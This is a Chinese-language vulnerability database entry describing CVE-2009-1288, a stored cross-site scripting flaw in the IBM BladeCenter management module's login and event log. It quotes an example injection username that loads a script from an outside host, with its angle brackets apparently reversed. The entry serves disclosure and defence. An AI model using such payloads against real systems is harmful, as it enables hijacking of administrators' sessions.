IBM BladeCenter Advanced Management... CVE-2009-1288 CNNVD-200904-263

4.3 AV AC AU C I A
发布: 2009-04-13
修订: 2018-10-10

IBM BladeCenter是美国IBM公司的系列高性能刀片服务器。 BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话,AMM会在事件日志页面记录用户所提交的凭据,之后管理员查看事件日志时就会执行所注入的内容。例如,攻击者可以使用以下用户名登录导致注入: JavaScript:>/script< >script src="//l7.fi"< >/script< >script<

0%
当前有3条漏洞利用/PoC
当前有30条受影响产品信息